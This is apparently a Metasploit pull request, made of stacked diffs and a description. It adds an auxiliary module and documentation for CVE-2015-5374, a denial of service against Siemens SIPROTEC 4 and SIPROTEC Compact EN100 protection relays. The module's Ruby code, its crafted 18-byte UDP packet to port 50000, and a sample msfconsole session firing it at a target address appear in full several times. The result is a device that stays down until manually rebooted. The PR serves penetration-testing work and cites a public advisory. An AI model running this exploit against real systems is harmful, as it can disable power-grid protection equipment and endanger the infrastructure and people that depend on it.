### PR TITLE
Siemens Siprotec 4 DoS exploit

### DIFF
--- a/documentation/modules/auxiliary/dos/siemens_siprotec4.md
+++ b/documentation/modules/auxiliary/dos/siemens_siprotec4.md
@@ -1,0 +1,74 @@
+## Description
+
+This module sends a specially crafted packet to Port 50000/UDP could cause a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) device. A manual reboot is required to return the device to service. 
+
+## Vulnerable Application
+
+Since this exploit hits the embedded software of a SCADA component, there is no vulnerable application for download on the web.
+You may check the vendor's website for additional information. (http://w3.siemens.com/smartgrid/global/en/products-systems-solutions/downloads/Pages/SIPROTEC-4-Downloads.aspx)
+You may also check the demo video: (https://drive.google.com/open?id=176ZC7nLJyJHGHPB3LbRxvLgArE9kOjPz)
+
+## Verification Steps
+
+- [ ] Start ```msfconsole```
+- [ ] ```use auxiliary/dos/scada/siemens_siprotec4```
+- [ ] Set ```RHOST <TARGET>```, replacing ```<TARGET>``` with the IP address you wish to attack.
+- [ ] ```run```
+- [ ] Verify that you see ```[*] Sending DoS packet ...```
+- [ ] Verify that you see ```[*] Auxiliary module execution completed```
+- [ ] Verify that the exploit sends a specially crafted packet which contains ```11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E```
+
+Document: (https://github.com/can/CVE-2015-5374-DoS-PoC/blob/master/README.md)
+Metasploit Module is written based on this exploit: (https://www.exploit-db.com/exploits/44103/)
+
+## Options
+
+  ```set RHOST <TARGET_IP>```, ```set RPORT <TARGET_PORT> (Default 50000)```.
+
+## Scenarios
+
+  ```
+msf auxiliary(siemens_siprotec4) > info
+
+       Name: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module Denial of Service 
+     Module: auxiliary/dos/scada/siemens_siprotec4
+    License: Metasploit Framework License (BSD)
+       Rank: Normal
+
+Provided by:
+  M. Can Kurnaz
+
+Basic options:
+  Name   Current Setting  Required  Description
+  ----   ---------------  --------  -----------
+  RHOST                   yes       The target address
+  RPORT  50000            yes       The target port (UDP)
+
+Description:
+  This module sends a specially crafted packet to port 50000/UDP 
+  causing a denial of service of the affected (Siemens SIPROTEC 4 and 
+  SIPROTEC Compact < V4.25) devices. A manual reboot is required to return the 
+  device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 
+  have been assigned to this vulnerability.
+
+References:
+  https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
+  https://www.exploit-db.com/exploits/44103/
+
+msf auxiliary(siemens_siprotec4) > show options 
+
+Module options (auxiliary/dos/scada/siemens_siprotec4):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   RHOST                   yes       The target address
+   RPORT  50000            yes       The target port (UDP)
+
+msf auxiliary(siemens_siprotec4) > set rhost 192.168.1.61
+rhost => 192.168.1.61
+msf auxiliary(siemens_siprotec4) > run
+
+[*] Sending DoS packet ... 
+[*] Auxiliary module execution completed
+msf auxiliary(siemens_siprotec4) > 
+```

--- a/modules/auxiliary/dos/scada/siemens_siprotec4.rb
+++ b/modules/auxiliary/dos/scada/siemens_siprotec4.rb
@@ -2,22 +2,18 @@
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
 require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary
-
     include Msf::Exploit::Remote::Udp
     include Msf::Auxiliary::Dos
     def initialize(info = {})
         super(update_info(info,
-            'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service ',
+            'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',
             'Description'    => %q{
                 This module sends a specially crafted packet to port 50000/UDP
                 causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.
                 A manual reboot is required to return the device to service.
                 CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
-                
             },
             'Author'         => [ 'M. Can Kurnaz' ],
             'License'        => MSF_LICENSE,
@@ -28,19 +24,14 @@ class MetasploitModule < Msf::Auxiliary
                     [ 'URL', 'https://www.exploit-db.com/exploits/44103/' ],
                     [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01' ]
                 ]))
-             
             register_options([Opt::RPORT(50000),], self.class)
     end
- 
     def run
         connect_udp
         pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
-     
         print_status("Sending DoS packet ... ")
-         
         udp_sock.put(pckt)
-         
         disconnect_udp
     end
-end 
+end
 # 0x43414e [2018-03-08]

--- a/modules/auxiliary/dos/scada/siemens_siprotec4.rb
+++ b/modules/auxiliary/dos/scada/siemens_siprotec4.rb
@@ -1,24 +1,21 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
- 
- 
+
 require 'msf/core'
- 
+
 class MetasploitModule < Msf::Auxiliary
- 
+
     include Msf::Exploit::Remote::Udp
     include Msf::Auxiliary::Dos
     def initialize(info = {})
-        super(update_info(info, 
+        super(update_info(info,
             'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service ',
             'Description'    => %q{
-                This module sends a specially crafted packet to port 50000/UDP 
-                causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices. 
-                A manual reboot is required to return the device to service. 
+                This module sends a specially crafted packet to port 50000/UDP
+                causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.
+                A manual reboot is required to return the device to service.
                 CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
                 
             },
@@ -38,14 +35,12 @@ class MetasploitModule < Msf::Auxiliary
     def run
         connect_udp
         pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
-         
+     
         print_status("Sending DoS packet ... ")
          
         udp_sock.put(pckt)
          
         disconnect_udp
     end
- 
-end
- 
+end 
 # 0x43414e [2018-03-08]

--- a/modules/auxiliary/dos/scada/siemens_siprotec4.rb
+++ b/modules/auxiliary/dos/scada/siemens_siprotec4.rb
@@ -14,10 +14,10 @@ class MetasploitModule < Msf::Auxiliary
     include Msf::Auxiliary::Dos
     def initialize(info = {})
         super(update_info(info, 
-            'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service ',
+            'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service ',
             'Description'    => %q{
                 This module sends a specially crafted packet to port 50000/UDP 
-                causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact) devices. 
+                causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices. 
                 A manual reboot is required to return the device to service. 
                 CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
                 

--- a/modules/auxiliary/dos/scada/siemens_siprotec4.rb
+++ b/modules/auxiliary/dos/scada/siemens_siprotec4.rb
@@ -2,12 +2,11 @@
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require 'msf/core'
 class MetasploitModule < Msf::Auxiliary
     include Msf::Exploit::Remote::Udp
     include Msf::Auxiliary::Dos
     def initialize(info = {})
-        super(update_info(info,
+        super(
             'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',
             'Description'    => %q{
                 This module sends a specially crafted packet to port 50000/UDP
@@ -23,8 +22,8 @@ class MetasploitModule < Msf::Auxiliary
                     [ 'CVE' '2015-5374' ],
                     [ 'URL', 'https://www.exploit-db.com/exploits/44103/' ],
                     [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01' ]
-                ]))
-            register_options([Opt::RPORT(50000),], self.class)
+                ])
+            register_options([Opt::RPORT(50000),])
     end
     def run
         connect_udp

--- a/modules/auxiliary/dos/scada/siemens_siprotec4.rb
+++ b/modules/auxiliary/dos/scada/siemens_siprotec4.rb
@@ -2,35 +2,36 @@
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+
 class MetasploitModule < Msf::Auxiliary
-    include Msf::Exploit::Remote::Udp
-    include Msf::Auxiliary::Dos
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Dos
     def initialize(info = {})
         super(
-            'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',
-            'Description'    => %q{
-                This module sends a specially crafted packet to port 50000/UDP
-                causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.
-                A manual reboot is required to return the device to service.
-                CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
+          'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',
+          'Description'    => %q{
+             This module sends a specially crafted packet to port 50000/UDP
+             causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.
+             A manual reboot is required to return the device to service.
+             CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
             },
-            'Author'         => [ 'M. Can Kurnaz' ],
-            'License'        => MSF_LICENSE,
-            'Version'        => '$Revision: 1 $',
-            'References'     =>
-                [
-                    [ 'CVE' '2015-5374' ],
-                    [ 'URL', 'https://www.exploit-db.com/exploits/44103/' ],
-                    [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01' ]
-                ])
-            register_options([Opt::RPORT(50000),])
-    end
-    def run
-        connect_udp
-        pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
-        print_status("Sending DoS packet ... ")
-        udp_sock.put(pckt)
-        disconnect_udp
-    end
+          'Author'         => [ 'M. Can Kurnaz' ],
+          'License'        => MSF_LICENSE,
+          'Version'        => '$Revision: 1 $',
+          'References'     =>
+            [
+              [ 'CVE' '2015-5374' ],
+              [ 'URL', 'https://www.exploit-db.com/exploits/44103/' ],
+              [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01' ]
+            ])
+        register_options([Opt::RPORT(50000),])
+  end
+  def run
+      connect_udp
+      pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
+      print_status("Sending DoS packet ... ")
+      udp_sock.put(pckt)
+      disconnect_udp
+  end
 end
-# 0x43414e [2018-03-08]
+

--- a/modules/auxiliary/dos/scada/siemens_siprotec4.rb
+++ b/modules/auxiliary/dos/scada/siemens_siprotec4.rb
@@ -1,0 +1,51 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+ 
+ 
+require 'msf/core'
+ 
+class MetasploitModule < Msf::Auxiliary
+ 
+    include Msf::Exploit::Remote::Udp
+    include Msf::Auxiliary::Dos
+    def initialize(info = {})
+        super(update_info(info, 
+            'Name'           => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service ',
+            'Description'    => %q{
+                This module sends a specially crafted packet to port 50000/UDP 
+                causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact) devices. 
+                A manual reboot is required to return the device to service. 
+                CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
+                
+            },
+            'Author'         => [ 'M. Can Kurnaz' ],
+            'License'        => MSF_LICENSE,
+            'Version'        => '$Revision: 1 $',
+            'References'     =>
+                [
+                    [ 'CVE' '2015-5374' ],
+                    [ 'URL', 'https://www.exploit-db.com/exploits/44103/' ],
+                    [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01' ]
+                ]))
+             
+            register_options([Opt::RPORT(50000),], self.class)
+    end
+ 
+    def run
+        connect_udp
+        pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
+         
+        print_status("Sending DoS packet ... ")
+         
+        udp_sock.put(pckt)
+         
+        disconnect_udp
+    end
+ 
+end
+ 
+# 0x43414e [2018-03-08]

--- a/modules/auxiliary/dos/scada/siemens_siprotec4.rb
+++ b/modules/auxiliary/dos/scada/siemens_siprotec4.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary
   def run
       connect_udp
       pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
-      print_status("Sending DoS packet ... ")
+      print_status('Sending DoS packet...')
       udp_sock.put(pckt)
       disconnect_udp
   end


### PR DESCRIPTION
This module sends a specially crafted packet to Port 50000/UDP could cause a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) device. A manual reboot is required to return the device to service. 

## Verification Steps

- [x] Start ```msfconsole```
- [x] ```use auxiliary/dos/scada/siemens_siprotec4```
- [x] Set ```RHOST <TARGET>```, replacing ```<TARGET>``` with the IP address you wish to attack.
- [x] ```run```
- [x] Verify that you see ```[*] Sending DoS packet ...```
- [x] Verify that you see ```[*] Auxiliary module execution completed```
- [x] Verify that the exploit sends a specially crafted packet which contains ```11 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 9E```

Document: (https://github.com/can/CVE-2015-5374-DoS-PoC/blob/master/README.md)
Metasploit Module has been created based on this exploit: (https://www.exploit-db.com/exploits/44103/)

## Options

  ```set RHOST <TARGET_IP>```, ```set RPORT <TARGET_PORT> (Default 50000)```.

## Scenarios

  ```
msf auxiliary(siemens_siprotec4) > info

       Name: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module Denial of Service 
     Module: auxiliary/dos/scada/siemens_siprotec4
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  M. Can Kurnaz

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  50000            yes       The target port (UDP)

Description:
  This module sends a specially crafted packet to port 50000/UDP 
  causing a denial of service of the affected (Siemens SIPROTEC 4 and 
  SIPROTEC Compact < V4.25) devices. A manual reboot is required to return the 
  device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 
  have been assigned to this vulnerability.

References:
  https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
  https://www.exploit-db.com/exploits/44103/

msf auxiliary(siemens_siprotec4) > show options 

Module options (auxiliary/dos/scada/siemens_siprotec4):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  50000            yes       The target port (UDP)

msf auxiliary(siemens_siprotec4) > set rhost 192.168.1.61
rhost => 192.168.1.61
msf auxiliary(siemens_siprotec4) > run

[*] Sending DoS packet ... 
[*] Auxiliary module execution completed
msf auxiliary(siemens_siprotec4) > 
```